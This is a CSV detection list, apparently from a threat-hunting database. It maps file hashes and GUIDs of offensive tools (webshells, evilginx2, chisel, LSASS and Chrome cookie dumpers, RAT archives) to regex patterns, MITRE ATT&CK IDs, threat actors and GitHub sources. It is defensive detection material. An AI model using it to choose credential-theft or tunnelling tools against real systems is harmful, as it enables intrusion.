"*b6a255086f4aefbd0e8b4b997b146dd95b04eb7c095c21c3269cdef16f538f3e*",".{0,1000}b6a255086f4aefbd0e8b4b997b146dd95b04eb7c095c21c3269cdef16f538f3e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34869"
"*b6aa7aa16083b7113fe5fe662a497c6c03a3c4aa74ff2c379b64fd9e9b495bcf*",".{0,1000}b6aa7aa16083b7113fe5fe662a497c6c03a3c4aa74ff2c379b64fd9e9b495bcf.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#filehash","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","34872"
"*b6ac954c208f9e813cbacebfbea30e9b71e252c9c35cea2aad4864cd9f1c492b*",".{0,1000}b6ac954c208f9e813cbacebfbea30e9b71e252c9c35cea2aad4864cd9f1c492b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","34873"
"*b6b9a733b2f7b86f8ae6a40ce230acb474f018c98e78da897a1ed631b653583c*",".{0,1000}b6b9a733b2f7b86f8ae6a40ce230acb474f018c98e78da897a1ed631b653583c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34874"
"*b6be69e72453d7363a2570495b36897124c72b2676351307f9d0d1b2a90f1b9d*",".{0,1000}b6be69e72453d7363a2570495b36897124c72b2676351307f9d0d1b2a90f1b9d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","34876"
"*b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c*",".{0,1000}b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34878"
"*b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344*",".{0,1000}b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34882"
"*b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92*",".{0,1000}b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34883"
"*b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b*",".{0,1000}b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","34885"
"*b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b*",".{0,1000}b6de30306cf70f10d77621a839e3be534cc938cd5736cb77887d3416aac9f27b.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","34886"
"*b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d*",".{0,1000}b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34887"
"*b6e84d3a61b5740043470953cd2029da16edf15e7eafd372d49748c2b931ba87*",".{0,1000}b6e84d3a61b5740043470953cd2029da16edf15e7eafd372d49748c2b931ba87.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34888"
"*b6e95607f7434e41adcaa98e42af0a47571c7af29ce0418aa582658f6f539c6e*",".{0,1000}b6e95607f7434e41adcaa98e42af0a47571c7af29ce0418aa582658f6f539c6e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34889"
"*b6ee8b7bc5bf06d29b65b730fa0aee08173fa7c0cd1b9c209f483de1edef0c65*",".{0,1000}b6ee8b7bc5bf06d29b65b730fa0aee08173fa7c0cd1b9c209f483de1edef0c65.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34890"
"*b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f*",".{0,1000}b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34891"
"*b6f96297c1c905e32413c6deb7e794cb8a1af37b9295e5cff257a6ff063ccbd4*",".{0,1000}b6f96297c1c905e32413c6deb7e794cb8a1af37b9295e5cff257a6ff063ccbd4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34893"
"*b6fa6edb0e958a897623e837947ed04a1cb52bdb31f567c55b5f10352b4f489e*",".{0,1000}b6fa6edb0e958a897623e837947ed04a1cb52bdb31f567c55b5f10352b4f489e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34894"
"*b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e*",".{0,1000}b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34895"
"*b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3*",".{0,1000}b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34897"
"*b700d5540e96d53325b1d2616925e34694ab52a4b144a0e250263895f8bad882*",".{0,1000}b700d5540e96d53325b1d2616925e34694ab52a4b144a0e250263895f8bad882.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34898"
"*b701f7ca92ab2180873b070d6a3354819c642c077ba7d9ab96eb20e876b9297d*",".{0,1000}b701f7ca92ab2180873b070d6a3354819c642c077ba7d9ab96eb20e876b9297d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34899"
"*b704713e230f60048904dcdcd8d61c7ef8f2750a60d52f57b914c44f1bae5054*",".{0,1000}b704713e230f60048904dcdcd8d61c7ef8f2750a60d52f57b914c44f1bae5054.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34900"
"*b710e7fbb1b4fbe07cc648c967c94a516308cfb0914f16ac5357f8caedc9f375*",".{0,1000}b710e7fbb1b4fbe07cc648c967c94a516308cfb0914f16ac5357f8caedc9f375.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34903"
"*b718b5c185eb16e7276da28a376095a99f45007a953080ad759d3c839d0c520f*",".{0,1000}b718b5c185eb16e7276da28a376095a99f45007a953080ad759d3c839d0c520f.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","34904"
"*b718d3a910fabbc4b525692d01c031565b84a9e6d4d4ce2a5df0dd67170165d0*",".{0,1000}b718d3a910fabbc4b525692d01c031565b84a9e6d4d4ce2a5df0dd67170165d0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34905"
"*b7204f1550e45bc13a6d896883bee7ac7a5a80442c77a86a6a33d74e6e69df73*",".{0,1000}b7204f1550e45bc13a6d896883bee7ac7a5a80442c77a86a6a33d74e6e69df73.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34907"
"*b72190a931400b03dc744f734d29162310c694f7bb85c9a78fb72589301dceae*",".{0,1000}b72190a931400b03dc744f734d29162310c694f7bb85c9a78fb72589301dceae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34908"
"*b72782bc3e57e54fe21104feeb218779cf739eafafab30b70a0d75f89083cdcd*",".{0,1000}b72782bc3e57e54fe21104feeb218779cf739eafafab30b70a0d75f89083cdcd.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34909"
"*b7291585c934f4554e645642cebf82f663316646ccf4360f356ff535d2d6c969*",".{0,1000}b7291585c934f4554e645642cebf82f663316646ccf4360f356ff535d2d6c969.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34910"
"*b7353069ada87797ea078b2abeb93751bb907edf28ecfa3f1479bcb79f16359f*",".{0,1000}b7353069ada87797ea078b2abeb93751bb907edf28ecfa3f1479bcb79f16359f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34912"
"*B7355478-EEE0-46A7-807A-23CF0C5295AE*",".{0,1000}B7355478\-EEE0\-46A7\-807A\-23CF0C5295AE.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","34913"
"*b735a1196f7a065564c3271323918fb345b4865338093eb8c9fb04d5840c8352*",".{0,1000}b735a1196f7a065564c3271323918fb345b4865338093eb8c9fb04d5840c8352.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34914"
"*b73fbf8da2f5fdb2cc06ee3d3995e1b63f03b34ce734bf1bdde49bb15af3f696*",".{0,1000}b73fbf8da2f5fdb2cc06ee3d3995e1b63f03b34ce734bf1bdde49bb15af3f696.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34916"
"*b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529*",".{0,1000}b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34917"
"*b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4*",".{0,1000}b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34918"
"*b7554de4073bb94a00faac4f83fc081f418158073d75ac53d06af29fde8efe9d*",".{0,1000}b7554de4073bb94a00faac4f83fc081f418158073d75ac53d06af29fde8efe9d.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","34921"
"*b75be6d2ff15abf81ac056295c5a397177de01718d05bba61e5abc025d9977f9*",".{0,1000}b75be6d2ff15abf81ac056295c5a397177de01718d05bba61e5abc025d9977f9.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","34922"
"*b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf*",".{0,1000}b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34923"
"*b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0*",".{0,1000}b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","34924"
"*b75fb086b5f0f38428c19a54675729901ca63bb056f48e99bf4a848263ccd901*",".{0,1000}b75fb086b5f0f38428c19a54675729901ca63bb056f48e99bf4a848263ccd901.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34926"
"*b7604b1463e8ea6d3829d8b6fd147911877b925e920ae530622283d4f7cefed9*",".{0,1000}b7604b1463e8ea6d3829d8b6fd147911877b925e920ae530622283d4f7cefed9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34927"
"*b764c55e619f1368b2b6ec3af8ce4c799a56b1d0d9e1fc19d2f204f7a94d4424*",".{0,1000}b764c55e619f1368b2b6ec3af8ce4c799a56b1d0d9e1fc19d2f204f7a94d4424.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34929"
"*b7651de4fa3eef93541b646ccef946ab0ea464ea937ab32e5c660cff82a808d9*",".{0,1000}b7651de4fa3eef93541b646ccef946ab0ea464ea937ab32e5c660cff82a808d9.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34930"
"*b765a6553f1916e7ccaf5ad4ea8cdb5cbb8539069c98538e4e163dabd6d998f0*",".{0,1000}b765a6553f1916e7ccaf5ad4ea8cdb5cbb8539069c98538e4e163dabd6d998f0.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34931"
"*b7671f125bb2ed21d0476a00cfaa9ed6*",".{0,1000}b7671f125bb2ed21d0476a00cfaa9ed6.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","34932"
"*b77770a81d59239b2ada0f633c563cca30e3bf3e112a8545aee13185265c6324*",".{0,1000}b77770a81d59239b2ada0f633c563cca30e3bf3e112a8545aee13185265c6324.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34936"
"*b777f5e0912b17dc92eb667dc845f2af041a98d6ff189c00e806f6acff5fa231*",".{0,1000}b777f5e0912b17dc92eb667dc845f2af041a98d6ff189c00e806f6acff5fa231.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34938"
"*b78010d1d8ea2064764c4cb4973ead007f7655e745d3856ab750537bc78b6e4d*",".{0,1000}b78010d1d8ea2064764c4cb4973ead007f7655e745d3856ab750537bc78b6e4d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34939"
"*b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b*",".{0,1000}b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34940"
"*b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6*",".{0,1000}b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34941"
